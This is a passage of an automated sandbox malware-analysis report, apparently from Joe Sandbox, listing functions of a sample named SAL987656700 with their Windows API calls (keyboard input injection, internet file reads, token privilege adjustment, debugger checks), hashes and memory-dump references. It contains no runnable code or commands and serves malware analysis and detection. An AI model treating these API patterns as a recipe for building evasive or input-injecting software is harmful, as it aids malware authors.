                                      • Opcode Fuzzy Hash: b0a794f1feaf6d45e46c22db4e08718cd87d43734649e30ff08bc31c374b56cb
                                      • Instruction Fuzzy Hash: EF514C71508311AFD714EF28D886A6BBBE8FF89754F04892DF585D7291EB30E904CB92
                                      Function 008EAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 008EAAAC
                                      • SetKeyboardState.USER32(00000080), ref: 008EAAC8
                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 008EAB36
                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 008EAB88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: ccff7d4544369880c4629a971e4946018ddd729397de361d74689278f5e95a31
                                      • Instruction ID: 278406e7893e7e0d91e283e4a86d1471c7c7f712af5f332d0c5403e8f6d665d2
                                      • Opcode Fuzzy Hash: ccff7d4544369880c4629a971e4946018ddd729397de361d74689278f5e95a31
                                      • Instruction Fuzzy Hash: A4312C70A40388AEFB388A66CC05BFA77A6FB96B30F04421AF181D61D0D375A985D753
                                      Function 00918FC9 Relevance: 6.1, APIs: 4, Instructions: 78nativewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • GetCursorPos.USER32(?), ref: 00919001
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008D7711,?,?,?,?,?), ref: 00919016
                                      • GetCursorPos.USER32(?), ref: 0091905E
                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,008D7711,?,?,?), ref: 00919094
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                      • String ID:
                                      • API String ID: 1423138444-0
                                      • Opcode ID: 33b2e9ed1d395e9b19ef2985605db1244b5f62eed15f828ffac6aa55bbba4905
                                      • Instruction ID: 1ffc8d716bb34fc51218f9e83dfac630a9e595242a05d6609db5edf234f0e223
                                      • Opcode Fuzzy Hash: 33b2e9ed1d395e9b19ef2985605db1244b5f62eed15f828ffac6aa55bbba4905
                                      • Instruction Fuzzy Hash: 83219F35711118EFCB25CF99CC68EEA7BB9EB49361F044069F90587261C3359D90EB60
                                      Function 008FCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 008FCE89
                                      • GetLastError.KERNEL32(?,00000000), ref: 008FCEEA
                                      • SetEvent.KERNEL32(?,?,00000000), ref: 008FCEFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorEventFileInternetLastRead
                                      • String ID:
                                      • API String ID: 234945975-0
                                      • Opcode ID: 298b1b18e8023262e11eac556cad869c290aa99a7d2505d844be39fceebcd854
                                      • Instruction ID: ba11365ed9d3c53c68cdf53d6e4bbc2747b2961116ba1bc2189d1ce2c9574e19
                                      • Opcode Fuzzy Hash: 298b1b18e8023262e11eac556cad869c290aa99a7d2505d844be39fceebcd854
                                      • Instruction Fuzzy Hash: C621ACB164430D9BEB20CF65CA48BA6B7F8FB50318F10881AE646D2151EB70EA04DB60
                                      Function 008EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,008C5222), ref: 008EDBCE
                                      • GetFileAttributesW.KERNEL32(?), ref: 008EDBDD
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008EDBEE
                                      • FindClose.KERNEL32(00000000), ref: 008EDBFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                      • String ID:
                                      • API String ID: 2695905019-0
                                      • Opcode ID: 5bfa242c1e36fa97c58a67d227672a03bf7df5d7cbff8534b0954c3a5da79bf4
                                      • Instruction ID: fe7ac88ffb42ac122eddb7dba32326c2316d53c2390438353bbeca957e99ca59
                                      • Opcode Fuzzy Hash: 5bfa242c1e36fa97c58a67d227672a03bf7df5d7cbff8534b0954c3a5da79bf4
                                      • Instruction Fuzzy Hash: 4CF0EC704686145782206B7C9C0D4EA376CEF03374B208702F435C11F0EBB09D58D5D6
                                      Function 008E8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008E82AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($|
                                      • API String ID: 1659193697-1631851259
                                      • Opcode ID: 3023c92987a408520a7e0fda77d8f7d9cbd18a5ac6594bb4a1fb33bad970b69a
                                      • Instruction ID: ff34cb07ca729c7ef2a905007d7c445628a756ae743506629372027b4af71f9e
                                      • Opcode Fuzzy Hash: 3023c92987a408520a7e0fda77d8f7d9cbd18a5ac6594bb4a1fb33bad970b69a
                                      • Instruction Fuzzy Hash: 75322474A04745DFCB28CF5AC481A6AB7F0FF48710B15856EE99ADB3A1EB70E941CB40
                                      Function 008F5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008F5CC1
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008F5D17
                                      • FindClose.KERNEL32(?), ref: 008F5D5F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: face222440950de0d9f638767c924c5b670f2680f449deae365cf3bd472b0d1b
                                      • Instruction ID: a4fedb577c48fddcadf37f47f3e45fb057adfca176d94e848d49b1119f56b7c6
                                      • Opcode Fuzzy Hash: face222440950de0d9f638767c924c5b670f2680f449deae365cf3bd472b0d1b
                                      • Instruction Fuzzy Hash: EF51CC746046059FD704EF28C484EA6B7E4FF4A318F14856DEA6ACB3A1DB30ED00CB92
                                      Function 008B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 008B271A
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008B2724
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 008B2731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: d4a862007036ba0a6f159767e2b595190ecca0a23a08d90a7318301cc69d1a8f
                                      • Instruction ID: 44231a2bfe11b946816d2e278db934ac370e391a6a93a1d8ce479c88b9745374
                                      • Opcode Fuzzy Hash: d4a862007036ba0a6f159767e2b595190ecca0a23a08d90a7318301cc69d1a8f
                                      • Instruction Fuzzy Hash: 1D31C4749512289BCB21DF68DC88BD8B7B8FF08310F5041EAE41CA6260EB309F818F45
                                      Function 008F51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F51DA
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008F5238
                                      • SetErrorMode.KERNEL32(00000000), ref: 008F52A1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 26fe9dec3da6080415252fbb093276335c6720d27b68d94538ff6cc12cb54824
                                      • Instruction ID: f5343837c285f699ff6ec1a555f1ede48c0f5298cf37dba3c1f2e411929d7365
                                      • Opcode Fuzzy Hash: 26fe9dec3da6080415252fbb093276335c6720d27b68d94538ff6cc12cb54824
                                      • Instruction Fuzzy Hash: 92318F75A00508DFDB00DF64D884EADBBB4FF09318F088099E905EB362DB31E845CBA1
                                      Function 008E16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0089FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008A0668
                                        • Part of subcall function 0089FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008A0685
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E170D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E173A
                                      • GetLastError.KERNEL32 ref: 008E174A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                      • String ID:
                                      • API String ID: 577356006-0
                                      • Opcode ID: 510994c888b5af8437e56d72c3689100d1dd8fb41a55cc5390a2760e1db5921b
                                      • Instruction ID: e40223511f25e5f40bbddb82035b874657175aef7549b4d9ab886e11d48fe063
                                      • Opcode Fuzzy Hash: 510994c888b5af8437e56d72c3689100d1dd8fb41a55cc5390a2760e1db5921b
                                      • Instruction Fuzzy Hash: A811C1B2514308AFDB18AF54DC8ADAAB7F9FB05714B24C52EE05697641EB70BC41CA20
                                      Function 008ED5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008ED608
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 008ED645
                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008ED650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: e920505067e59bfd99778733b450b23b9b1ee960329189829c8975a2b532defb
                                      • Instruction ID: 490af4e8c68456b9033636d2d52b0bfb96cf90a4281d781622f44f9ee649c1f9
                                      • Opcode Fuzzy Hash: e920505067e59bfd99778733b450b23b9b1ee960329189829c8975a2b532defb
                                      • Instruction Fuzzy Hash: 25117CB1E45228BBDB108F959C44FEFBBBCEB45B50F108111F924E7290C2704A058BE1
                                      Function 008E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008E168C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E16A1
                                      • FreeSid.ADVAPI32(?), ref: 008E16B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: a5c5bdfe66946985e0f280c1a2872c9cd1151d7ee829eed423e215df733d5b83
                                      • Instruction ID: aa4c5b3b46f3830d75c287641ced63e6ffb850eeaec2ad30b209f7bc22a3986c
                                      • Opcode Fuzzy Hash: a5c5bdfe66946985e0f280c1a2872c9cd1151d7ee829eed423e215df733d5b83
                                      • Instruction Fuzzy Hash: 3EF0F4B1A90309FBDF00DFE49C89EAEBBBCFB08604F508565E501E2191E774AA449A50
                                      Function 008A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(008B28E9,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002,00000000,?,008B28E9), ref: 008A4D09
                                      • TerminateProcess.KERNEL32(00000000,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002,00000000,?,008B28E9), ref: 008A4D10
                                      • ExitProcess.KERNEL32 ref: 008A4D22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 301272f74f2cbb7af78f7c33410a2fcb76987c0b24a4c2e7ab5cf04c060239c0
                                      • Instruction ID: 9d2787c340cdcf857163db68a9ea59a646fe84361be19f9af7ee43761970f64d
                                      • Opcode Fuzzy Hash: 301272f74f2cbb7af78f7c33410a2fcb76987c0b24a4c2e7ab5cf04c060239c0
                                      • Instruction Fuzzy Hash: E0E0B671154148ABDF11AF58DE09A987B69FB82785B108014FD15CA632DB75DE42EB80
                                      Function 008BC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /
                                      • API String ID: 0-2043925204
                                      • Opcode ID: 6c93c7510dbd160a881d45fb52be4ac385dc986e3f31ad181121736a3e7dd023
                                      • Instruction ID: ea24f4290d8f22613c6b1c62193a3db08cc46bc8044659c0b3283fca963ee6fb
                                      • Opcode Fuzzy Hash: 6c93c7510dbd160a881d45fb52be4ac385dc986e3f31ad181121736a3e7dd023
                                      • Instruction Fuzzy Hash: 88412676900619AFCB209FB9CC89EFB7BB8FB84314F504269F915D7380E6709E818B54
                                      Function 008DD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 008DD28C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID: X64
                                      • API String ID: 2645101109-893830106
                                      • Opcode ID: 5dee592191d317b77f2b31bbf99cf381c99b4381dfbe6afbc52007109d0b2164
                                      • Instruction ID: 40330c672fad80cbfe8036401ead0e2761d6662adafe0a0c7218ac6837448000
                                      • Opcode Fuzzy Hash: 5dee592191d317b77f2b31bbf99cf381c99b4381dfbe6afbc52007109d0b2164
                                      • Instruction Fuzzy Hash: 52D0CAB581522DEACF94DBA0EC88DDAB3BCFB08349F104292F146E2100DB30A6489F20
                                      Function 008ACAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction ID: 0ce93bf9f9326e47cdd5d501d520aa076e36fa06db0e224c3193bb396b89134e
                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction Fuzzy Hash: 5E020B71E002199FEF14CFA9C8806ADFBF1FF49324F25816AD919E7784D731AA418B94
                                      Function 008997C0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON
                                      Download Yara Rule
                                      APIs
